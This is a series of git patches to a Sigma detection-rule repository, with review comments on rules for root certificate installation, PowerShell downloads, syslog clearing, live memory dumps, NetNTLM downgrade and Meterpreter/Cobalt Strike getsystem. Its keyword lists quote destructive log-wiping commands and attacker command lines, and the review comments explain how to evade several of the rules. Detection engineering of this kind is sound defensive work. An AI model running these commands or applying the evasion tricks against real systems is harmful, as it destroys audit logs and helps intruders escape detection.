@@ -0,0 +1,31 @@ +title: Detected Windows Software Discovery +id: e13f668e-7f95-443d-98d2-1816a7648a7b +related: + - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 + type: derived +description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. +status: experimental +author: Nikita Nazarov, oscd.community +date: 2020/10/16 +modified: 2021/09/21 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md + - https://github.com/harleyQu1nn/AggressorScripts #AVQuery.cna +tags: + - attack.discovery + - attack.t1518 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\reg.exe' # Example: reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion + CommandLine|contains|all: + - 'query' + - '\software\' + - '/v' + - 'svcversion' + condition: selection +level: medium +falsepositives: + - Legitimate administration activities \ No newline at end of file From ba3c7a020ad327e90fed108c6d46843232d93ab4 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:34:32 +0200 Subject: [PATCH 1015/1367] split global win_root_certificate_installed.yml --- .../win_root_certificate_installed.yml | 30 ++++------------- ...ss_creation_root_certificate_installed.yml | 33 +++++++++++++++++++ 2 files changed, 39 insertions(+), 24 deletions(-) create mode 100644 rules/windows/process_creation/process_creation_root_certificate_installed.yml diff --git a/rules/windows/builtin/win_root_certificate_installed.yml b/rules/windows/builtin/win_root_certificate_installed.yml index f670b8f4..5c2557e0 100644 --- a/rules/windows/builtin/win_root_certificate_installed.yml +++ b/rules/windows/builtin/win_root_certificate_installed.yml 
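Review bot: The selection requires `svcversion` inside `CommandLine|contains|all`, which ties a rule titled "Detected Windows Software Discovery" to exactly one query — the Internet Explorer version value from the referenced atomic test — and nothing else under T1518, so the title and description overstate what fires. Either state the limit in `description` (`Detects only the reg query of the IE svcVersion value`) or loosen the list to `query` plus `\software\` with a filter for noisy management-agent keys, and revisit `level: medium` accordingly. The falsepositives entry "Legitimate administration activities" is true but vague; naming inventory and software-management agents that run `reg query` would help triage.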
@@ -1,21 +1,15 @@ -action: global title: Root Certificate Installed +id: 42821614-9264-4761-acfc-5772c3286f76 status: experimental description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md author: 'oscd.community, @redcanary, Zach Stanford @svch0st' date: 2020/10/10 +modified: 2021/09/21 tags: - attack.defense_evasion - attack.t1553.004 -level: medium -falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP -detection: - condition: 1 of them ---- -id: 42821614-9264-4761-acfc-5772c3286f76 logsource: product: windows service: powershell @@ -30,19 +24,7 @@ detection: ScriptBlockText|contains|all: - 'Import-Certificate' - 'Cert:\LocalMachine\Root' ---- -id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc -logsource: - category: process_creation - product: windows -detection: - selection1: - Image|endswith: '\certutil.exe' # Example: certutil -addstore -f -user ROOT CertificateFileName.der - CommandLine|contains|all: - - '-addstore' - - 'root' - selection2: - Image|endswith: '\CertMgr.exe' # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all - CommandLine|contains|all: - - '/add' - - 'root' + condition: selection1 or selection2 +level: medium +falsepositives: + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP \ No newline at end of file diff --git a/rules/windows/process_creation/process_creation_root_certificate_installed.yml b/rules/windows/process_creation/process_creation_root_certificate_installed.yml new file mode 100644 index 00000000..8cfbde40 --- /dev/null +++ b/rules/windows/process_creation/process_creation_root_certificate_installed.yml 
@@ -0,0 +1,33 @@ +title: Root Certificate Installed +id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc +related: + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived +status: experimental +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md +author: 'oscd.community, @redcanary, Zach Stanford @svch0st' +date: 2020/10/10 +modified: 2021/09/21 +tags: + - attack.defense_evasion + - attack.t1553.004 +logsource: + category: process_creation + product: windows +detection: + selection1: + Image|endswith: '\certutil.exe' # Example: certutil -addstore -f -user ROOT CertificateFileName.der + CommandLine|contains|all: + - '-addstore' + - 'root' + selection2: + Image|endswith: '\CertMgr.exe' # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all + CommandLine|contains|all: + - '/add' + - 'root' + condition: selection1 or selection2 +level: medium +falsepositives: + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP \ No newline at end of file From 8c13bd23b936af8bdd3da1901eb2bd09fb14c5e1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:44:19 +0200 Subject: [PATCH 1016/1367] split global win_powershell_web_request --- .../powershell_web_request.yml} | 32 ++++++------------- ...rocess_creation_powershell_web_request.yml | 30 +++++++++++++++++ 2 files changed, 39 insertions(+), 23 deletions(-) rename rules/windows/{builtin/win_powershell_web_request.yml => powershell/powershell_web_request.yml} (73%) create mode 100644 rules/windows/process_creation/process_creation_powershell_web_request.yml 
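Review bot: `CommandLine|contains|all: '-addstore', 'root'` only matches the dash form of the switch, and certutil accepts slash-prefixed switches interchangeably, so `certutil /addstore root evil.cer` skips selection1 by changing one character. Split the `contains|all` into two ANDed selections, one with `CommandLine|contains: ['-addstore', '/addstore']` and one with `CommandLine|contains: 'root'`, and combine them in the condition. The CertMgr selection already uses the slash form, so this brings the two into line.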
diff --git a/rules/windows/builtin/win_powershell_web_request.yml b/rules/windows/powershell/powershell_web_request.yml similarity index 73% rename from rules/windows/builtin/win_powershell_web_request.yml rename to rules/windows/powershell/powershell_web_request.yml index 427d7ea9..fb66db23 100644 --- a/rules/windows/builtin/win_powershell_web_request.yml +++ b/rules/windows/powershell/powershell_web_request.yml @@ -1,5 +1,8 @@ -action: global title: Windows PowerShell Web Request +id: 1139d2e2-84b1-4226-b445-354492eba8ba +related: + - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d + type: derived status: experimental description: Detects the use of various web request methods (including aliases) via Windows PowerShell command references: @@ -7,32 +10,11 @@ references: - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell author: James Pemberton / @4A616D6573 date: 2019/10/24 -modified: 2020/08/24 +modified: 2021/09/21 tags: - attack.execution - attack.t1059.001 - attack.t1086 #an old one -detection: - condition: selection -falsepositives: - - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. -level: medium ---- -id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains: - - 'Invoke-WebRequest' - - 'iwr ' - - 'wget ' - - 'curl ' - - 'Net.WebClient' - - 'Start-BitsTransfer' ---- -id: 1139d2e2-84b1-4226-b445-354492eba8ba logsource: product: windows service: powershell @@ -47,3 +29,7 @@ detection: - 'curl ' - 'Net.WebClient' - 'Start-BitsTransfer' + condition: selection +falsepositives: + - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. +level: medium diff --git a/rules/windows/process_creation/process_creation_powershell_web_request.yml b/rules/windows/process_creation/process_creation_powershell_web_request.yml new file mode 100644 index 00000000..8e5dc23e --- /dev/null 
+++ b/rules/windows/process_creation/process_creation_powershell_web_request.yml @@ -0,0 +1,30 @@ +title: Windows PowerShell Web Request +id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d +status: experimental +description: Detects the use of various web request methods (including aliases) via Windows PowerShell command +references: + - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ + - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell +author: James Pemberton / @4A616D6573 +date: 2019/10/24 +modified: 2021/09/21 +tags: + - attack.execution + - attack.t1059.001 + - attack.t1086 #an old one +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - 'Invoke-WebRequest' + - 'iwr ' + - 'wget ' + - 'curl ' + - 'Net.WebClient' + - 'Start-BitsTransfer' + condition: selection +falsepositives: + - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. +level: medium \ No newline at end of file From 20a785bad36c7f616afe308e0de0534625b14167 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 13:55:04 +0200 Subject: [PATCH 1017/1367] split global win_powershell_script_installed_as_service.yml --- ...powershell_script_installed_as_service.yml | 38 +++++-------------- ...powershell_script_installed_as_service.yml | 29 ++++++++++++++ ...powershell_script_installed_as_service.yml | 27 +++++++++++++ 3 files changed, 66 insertions(+), 28 deletions(-) create mode 100644 rules/windows/builtin/win_security_powershell_script_installed_as_service.yml create mode 100644 rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml diff --git a/rules/windows/builtin/win_powershell_script_installed_as_service.yml b/rules/windows/builtin/win_powershell_script_installed_as_service.yml index 6ebf00e9..ba5aef7e 100644 --- a/rules/windows/builtin/win_powershell_script_installed_as_service.yml 
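Review bot: The process_creation selection matches `CommandLine|contains` on `'wget '`, `'curl '` and `'iwr '` with no `Image` or `ParentImage` restriction, so any process whose command line carries those tokens fires — notably the native `curl.exe` shipped with current Windows builds and any batch or CI runner — which is not a "Windows PowerShell Web Request" and at `level: medium` will drown the PowerShell hits. Add `Image|endswith: ['\powershell.exe', '\pwsh.exe']` to the selection, or keep `Invoke-WebRequest`, `Net.WebClient` and `Start-BitsTransfer` image-agnostic and gate only the short aliases on those images in a second selection. The falsepositives entry should then also mention native curl/wget usage outside PowerShell if the gate is not adopted.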
+++ b/rules/windows/builtin/win_powershell_script_installed_as_service.yml @@ -1,25 +1,15 @@ -action: global title: PowerShell Scripts Installed as Services +id: a2e5019d-a658-4c6a-92bf-7197b54e2cae description: Detects powershell script installed as a Service status: experimental author: oscd.community, Natalia Shornikova date: 2020/10/06 -modified: 2021/05/21 +modified: 2021/09/21 references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse tags: - attack.execution - attack.t1569.002 -detection: - powershell_as_service: - ServiceFileName|contains: - - 'powershell' - - 'pwsh' - condition: service_creation and powershell_as_service -falsepositives: - - Unknown -level: high ---- id: a2e5019d-a658-4c6a-92bf-7197b54e2cae logsource: product: windows @@ -27,19 +17,11 @@ logsource: detection: service_creation: EventID: 7045 ---- -id: 46deb5e1-28c9-4905-b2df-51cdcc9e6073 -logsource: - product: windows - service: sysmon -detection: - service_creation: - EventID: 6 ---- -id: 2a926e6a-4b81-4011-8a96-e36cc8c04302 -logsource: - product: windows - service: security -detection: - service_creation: - EventID: 4697 + powershell_as_service: + ImagePath|contains: + - 'powershell' + - 'pwsh' + condition: service_creation and powershell_as_service +falsepositives: + - Unknown +level: high diff --git a/rules/windows/builtin/win_security_powershell_script_installed_as_service.yml b/rules/windows/builtin/win_security_powershell_script_installed_as_service.yml new file mode 100644 index 00000000..8da937ee --- /dev/null +++ b/rules/windows/builtin/win_security_powershell_script_installed_as_service.yml 
@@ -0,0 +1,29 @@ +title: PowerShell Scripts Installed as Services +id: 2a926e6a-4b81-4011-8a96-e36cc8c04302 +related: + - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae + type: derived +description: Detects powershell script installed as a Service +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/06 +modified: 2021/09/21 +references: + - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse +tags: + - attack.execution + - attack.t1569.002 +logsource: + product: windows + service: security +detection: + service_creation: + EventID: 4697 + powershell_as_service: + ServiceFileName|contains: + - 'powershell' + - 'pwsh' + condition: service_creation and powershell_as_service +falsepositives: + - Unknown +level: high \ No newline at end of file diff --git a/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml b/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml new file mode 100644 index 00000000..468a4f5f --- /dev/null +++ b/rules/windows/driver_load/driver_load_powershell_script_installed_as_service.yml @@ -0,0 +1,27 @@ +title: PowerShell Scripts Run by a Services +id: 46deb5e1-28c9-4905-b2df-51cdcc9e6073 +related: + - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae + type: derived +description: Detects powershell script installed as a Service +status: experimental +author: oscd.community, Natalia Shornikova +date: 2020/10/06 +modified: 2021/09/21 +references: + - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse +tags: + - attack.execution + - attack.t1569.002 +logsource: + product: windows + category: driver_load +detection: + powershell_as_service: + ImageLoaded|contains: + - 'powershell' + - 'pwsh' + condition: powershell_as_service +falsepositives: + - Unknown +level: high \ No newline at end of file From 346ff26809121faa445c102a5b4ffd58eae76bee Mon Sep 17 00:00:00 2001 
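Review bot: This rule sits in `category: driver_load` with `ImageLoaded|contains: 'powershell' / 'pwsh'`, but it was split from a Sysmon EventID 6 (Driver loaded) source and PowerShell is never loaded as a kernel driver, so the selection cannot match what this category produces and the rule is effectively dead at `level: high`. If the author meant image loads of the PowerShell engine inside a service host, that is a different detection from "installed as a Service" (which the 7045 and 4697 twins already cover) and belongs in `category: image_load` with its own title and description; otherwise the file should be dropped rather than shipped as a non-firing rule. As a nit, the title `PowerShell Scripts Run by a Services` has a grammar slip and the `description` still says "installed as a Service".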
From: Max Altgelt Date: Tue, 21 Sep 2021 14:22:17 +0200 Subject: [PATCH 1018/1367] feat: Add rule for syslog removal --- rules/linux/lnx_clear_syslog.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/linux/lnx_clear_syslog.yml diff --git a/rules/linux/lnx_clear_syslog.yml b/rules/linux/lnx_clear_syslog.yml new file mode 100644 index 00000000..4ca3a5a2 --- /dev/null +++ b/rules/linux/lnx_clear_syslog.yml @@ -0,0 +1,27 @@ +title: Clearing syslog +id: e09eb557-96d2-4de9-ba2d-30f712a5afd3 +status: experimental +description: Detects removal of the syslog +author: Max Altgelt +date: 2021/09/10 +references: + - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474 +logsource: + product: linux +detection: + selection: + - 'rm /var/log/syslog' + - 'rm -r /var/log/syslog' + - 'rm -f /var/log/syslog' + - 'rm -rf /var/log/syslog' + - 'mv /var/log/syslog' + - ' >/var/log/syslog' + - ' > /var/log/syslog' + falsepositives: + - '/syslog.' + condition: selection and not falsepositives +falsepositives: + - Log rotation +level: high +tags: + - attack.persistence From a5c8fba7a5c07271092e0f760b923e8f6d40aa3a Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 15:01:51 +0200 Subject: [PATCH 1019/1367] fix error --- .../builtin/win_powershell_script_installed_as_service.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/builtin/win_powershell_script_installed_as_service.yml b/rules/windows/builtin/win_powershell_script_installed_as_service.yml index ba5aef7e..30fa2700 100644 --- a/rules/windows/builtin/win_powershell_script_installed_as_service.yml +++ b/rules/windows/builtin/win_powershell_script_installed_as_service.yml @@ -10,7 +10,6 @@ references: tags: - attack.execution - attack.t1569.002 -id: a2e5019d-a658-4c6a-92bf-7197b54e2cae logsource: product: windows service: system From 8c3faa390c8b20a6ad66579a18894db86a3764f2 Mon Sep 17 00:00:00 2001 
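Review bot: The rule tags syslog removal as `attack.persistence`, while the Windows eventlog-clearing rules in this same series (win_susp_eventlog_cleared.yml) use `attack.defense_evasion` and `attack.t1070`; the matching Linux technique is T1070.002, so `tags: - attack.defense_evasion - attack.t1070.002` is the consistent choice. The keywords are whole-command strings, so `rm -rf /var/log/syslog` matches but `rm -rf /var/log/*`, `truncate -s0 /var/log/syslog`, `cat /dev/null > /var/log/syslog`, `:> /var/log/syslog` and `shred` do not; a field-based selection on the destructive command plus a `contains` on `/var/log/syslog` would be harder to sidestep, if the chosen logsource exposes a command-line field. Naming the exclusion selection `falsepositives` shadows the top-level `falsepositives:` key and is easy to misread — `filter_rotated` with a comment that it excludes rotated files such as `/var/log/syslog.1` says what it does. `logsource: product: linux` with no category or service leaves each backend to pick which log this keyword search runs over; if shell or auditd command logging is intended, name it.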
From: Max Altgelt Date: Tue, 21 Sep 2021 14:55:50 +0200 Subject: [PATCH 1020/1367] feat: Add rule for live memory dumping --- ...ll_memorydump_getstoragediagnosticinfo.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml diff --git a/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml new file mode 100644 index 00000000..a4b975e4 --- /dev/null +++ b/rules/windows/powershell/powershell_memorydump_getstoragediagnosticinfo.yml @@ -0,0 +1,23 @@ +title: Live Memory Dump using Get-StorageDiagnosticInfo +id: cd185561-4760-45d6-a63e-a51325112cae +status: experimental +description: Detects a Command used to dump the live memory of a Windows machine +date: 2021/09/21 +references: + - https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo +tags: + - attack.t1003 +author: Max Altgelt +logsource: + product: windows + service: powershell +detection: + dump: + EventID: 4104 + ScriptBlockText|contains|all: + - Get-StorageDiagnosticInfo + - -IncludeLiveDump + condition: dump +falsepositives: + - Diagnostics +level: high From a4ad7e53581cffb5f955601d8f70e323f16b0b59 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 15:10:08 +0200 Subject: [PATCH 1021/1367] split global win_net_ntlm_downgrade.yml --- .../builtin/win_net_ntlm_downgrade.yml | 28 +++-------------- .../registry_event_net_ntlm_downgrade.yml | 30 +++++++++++++++++++ 2 files changed, 34 insertions(+), 24 deletions(-) create mode 100644 rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml diff --git a/rules/windows/builtin/win_net_ntlm_downgrade.yml b/rules/windows/builtin/win_net_ntlm_downgrade.yml index 062e6aa5..e0d1ad8d 100644 --- a/rules/windows/builtin/win_net_ntlm_downgrade.yml +++ b/rules/windows/builtin/win_net_ntlm_downgrade.yml 
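Review bot: `ScriptBlockText|contains|all` requires the literal `-IncludeLiveDump`, but PowerShell accepts any unambiguous parameter prefix, so `Get-StorageDiagnosticInfo -IncludeL` still triggers the live dump and bypasses the rule; matching on `- -IncludeL` instead of the full name closes that gap at no cost since it is a substring of the full switch. The rule carries only the technique tag `attack.t1003`; the other T1003 rules in this series pair it with the tactic `attack.credential_access`, so add that for consistency. `EventID: 4104` also presumes script block logging is enabled, which is worth a sentence in `description` so analysts know when a negative result is meaningless.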
@@ -1,5 +1,8 @@ -action: global title: NetNTLM Downgrade Attack +id: d3abac66-f11c-4ed0-8acb-50cc29c97eed +related: + - id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 + type: derived description: Detects NetNTLM downgrade attack references: - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks @@ -11,30 +14,7 @@ tags: - attack.t1089 # an old one - attack.t1562.001 - attack.t1112 -detection: - condition: 1 of them -falsepositives: - - Unknown -level: critical ---- -id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 -logsource: - product: windows - category: registry_event -detection: - selection1: - TargetObject|contains|all: - - 'SYSTEM\' - - 'ControlSet' - - '\Control\Lsa' - TargetObject|endswith: - - '\lmcompatibilitylevel' - - '\NtlmMinClientSec' - - '\RestrictSendingNTLMTraffic' - ---- # Windows Security Eventlog: Process Creation with Full Command Line -id: d3abac66-f11c-4ed0-8acb-50cc29c97eed logsource: product: windows service: security diff --git a/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml b/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml new file mode 100644 index 00000000..b8689348 --- /dev/null +++ b/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml 
@@ -0,0 +1,30 @@ +title: NetNTLM Downgrade Attack +id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 +description: Detects NetNTLM downgrade attack +references: + - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks +author: Florian Roth, wagga +date: 2018/03/20 +modified: 2021/09/21 +tags: + - attack.defense_evasion + - attack.t1089 # an old one + - attack.t1562.001 + - attack.t1112 +logsource: + product: windows + category: registry_event +detection: + selection1: + TargetObject|contains|all: + - 'SYSTEM\' + - 'ControlSet' + - '\Control\Lsa' + TargetObject|endswith: + - '\lmcompatibilitylevel' + - '\NtlmMinClientSec' + - '\RestrictSendingNTLMTraffic' + condition: selection +falsepositives: + - Unknown +level: critical \ No newline at end of file From 7c8d1ab0375ebd92b6b53836044a62373e733aab Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 15:18:25 +0200 Subject: [PATCH 1022/1367] split global win_moriya_rootkit.yml --- rules/windows/builtin/win_moriya_rootkit.yml | 21 ++++----------- .../file_event/file_event_moriya_rootkit.yml | 26 +++++++++++++++++++ 2 files changed, 31 insertions(+), 16 deletions(-) create mode 100644 rules/windows/file_event/file_event_moriya_rootkit.yml diff --git a/rules/windows/builtin/win_moriya_rootkit.yml b/rules/windows/builtin/win_moriya_rootkit.yml index 276d88f6..7f638760 100644 --- a/rules/windows/builtin/win_moriya_rootkit.yml +++ b/rules/windows/builtin/win_moriya_rootkit.yml 
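Review bot: `condition: selection` references a selection that does not exist in this file; the only selection defined is `selection1`, so the rule is broken at this commit until either `  selection:` or `  condition: selection1` is used. Patch 1023 later in this series renames it, but the intermediate state does not parse as a valid Sigma rule. The file also ends without a trailing newline (`\ No newline at end of file`), which several of the other new files in this series share.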
@@ -1,21 +1,16 @@ -action: global title: Moriya Rootkit +id: 25b9c01c-350d-4b95-bed1-836d04a4f324 description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report status: experimental author: Bhabesh Raj date: 2021/05/06 -modified: 2021/05/12 -level: critical -falsepositives: - - None +modified: 2021/09/21 references: - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 tags: - attack.persistence - attack.privilege_escalation - attack.t1543.003 ---- -id: 25b9c01c-350d-4b95-bed1-836d04a4f324 logsource: product: windows service: system @@ -24,12 +19,6 @@ detection: EventID: 7045 ServiceName: ZzNetSvc condition: selection ---- -id: a1507d71-0b60-44f6-b17c-bf53220fdd88 -logsource: - product: windows - category: file_event -detection: - selection: - TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys' - condition: selection +level: critical +falsepositives: + - None \ No newline at end of file diff --git a/rules/windows/file_event/file_event_moriya_rootkit.yml b/rules/windows/file_event/file_event_moriya_rootkit.yml new file mode 100644 index 00000000..2383f3a8 --- /dev/null +++ b/rules/windows/file_event/file_event_moriya_rootkit.yml @@ -0,0 +1,26 @@ +title: Moriya Rootkit +id: a1507d71-0b60-44f6-b17c-bf53220fdd88 +related: + - id: 25b9c01c-350d-4b95-bed1-836d04a4f324 + type: derived +description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report +status: experimental +author: Bhabesh Raj +date: 2021/05/06 +modified: 2021/09/21 +references: + - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1543.003 +logsource: + product: windows + category: file_event +detection: + selection: + TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys' + condition: selection +level: critical +falsepositives: + - None \ No newline at end of file 
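Review bot: `TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys'` in the new file_event rule is an exact match on the full path, so a system drive other than `C:` or a non-default Windows directory would miss the same driver drop; `TargetFilename|endswith: '\drivers\MoriyaStreamWatchmen.sys'` keeps the indicator while dropping the brittle prefix. The same full-path value was already in the global rule, so this is a pre-existing weakness that the split carries over rather than something this commit introduces.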
From 0dd549ba67b3ae27c378337f32139bbccb7f01c6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 15:25:03 +0200 Subject: [PATCH 1023/1367] fix selection name --- .../registry_event/registry_event_net_ntlm_downgrade.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml b/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml index b8689348..ab26594b 100644 --- a/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml +++ b/rules/windows/registry_event/registry_event_net_ntlm_downgrade.yml @@ -15,7 +15,7 @@ logsource: product: windows category: registry_event detection: - selection1: + selection: TargetObject|contains|all: - 'SYSTEM\' - 'ControlSet' From 9dbc71ca2ff8e6947d24c97048f77c77ac29274e Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 21 Sep 2021 15:50:06 +0200 Subject: [PATCH 1024/1367] split global win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml --- ...tstrike_getsystem_service_installation.yml | 44 +++++---------- ...tstrike_getsystem_service_installation.yml | 56 +++++++++++++++++++ ...tstrike_getsystem_service_installation.yml | 55 ++++++++++++++++++ 3 files changed, 125 insertions(+), 30 deletions(-) create mode 100644 rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml create mode 100644 rules/windows/driver_load/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml diff --git a/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml index 0bd04b69..3ce6bc05 100644 --- a/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml +++ b/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml 
@@ -1,9 +1,9 @@ -action: global title: Meterpreter or Cobalt Strike Getsystem Service Installation +id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation author: Teymur Kheirkhabarov, Ecco, Florian Roth date: 2019/10/26 -modified: 2021/05/20 +modified: 2021/09/21 references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ 
@@ -12,58 +12,42 @@ tags: - attack.t1134 # an old one - attack.t1134.001 - attack.t1134.002 +logsource: + product: windows + service: system detection: + selection_id: + EventID: 7045 selection: # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a - - ServiceFileName|contains|all: + - ImagePath|contains|all: - 'cmd' - '/c' - 'echo' - '\pipe\' # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a - - ServiceFileName|contains|all: + - ImagePath|contains|all: - '%COMSPEC%' - '/c' - 'echo' - '\pipe\' # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a - - ServiceFileName|contains|all: + - ImagePath|contains|all: - 'cmd.exe' - '/c' - 'echo' - '\pipe\' # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn - - ServiceFileName|contains|all: + - ImagePath|contains|all: - 'rundll32' - '.dll,a' - '/p:' - condition: selection + condition: selection_id and selection fields: - ComputerName - SubjectDomainName - SubjectUserName - - ServiceFileName + - ImagePath falsepositives: - Highly unlikely -level: critical ---- -id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 -logsource: - product: windows - service: system -detection: - selection: - EventID: 7045 ---- -id: d585ab5a-6a69-49a8-96e8-4a726a54de46 -logsource: - product: windows - category: driver_load ---- -id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34 -logsource: - product: windows - service: security -detection: - selection: - EventID: 4697 +level: critical \ No newline at end of file diff --git a/rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml b/rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml new file mode 100644 index 00000000..6fd722d3 --- /dev/null +++ b/rules/windows/builtin/win_security_meterpreter_or_cobaltstrike_getsystem_service_installation.yml 
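Review bot: The `fields:` list of the System-log rule still names `SubjectDomainName` and `SubjectUserName`, which are the Security 4697 field names that the sibling Security rule uses, while the match field in the same hunk was renamed to `ImagePath` for 7045; as far as I recall, System 7045 events carry `AccountName` rather than a Subject* pair, so the fields list should be adjusted the same way as the selection — confirm against the event schema. The selection itself is consistent: `selection_id` pins `EventID: 7045` and the command-line indicators now match `ImagePath`.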
@@ -0,0 +1,56 @@ +title: Meterpreter or Cobalt Strike Getsystem Service Installation +id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34 +related: + - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 + type: derived +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation +author: Teymur Kheirkhabarov, Ecco, Florian Roth +date: 2019/10/26 +modified: 2021/09/21 +references: + - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment + - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +tags: + - attack.privilege_escalation + - attack.t1134 # an old one + - attack.t1134.001 + - attack.t1134.002 +logsource: + product: windows + service: security +detection: + selection_id: + EventID: 4697 + selection: + # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + - ServiceFileName|contains|all: + - 'cmd' + - '/c' + - 'echo' + - '\pipe\' + # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + - ServiceFileName|contains|all: + - '%COMSPEC%' + - '/c' + - 'echo' + - '\pipe\' + # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > 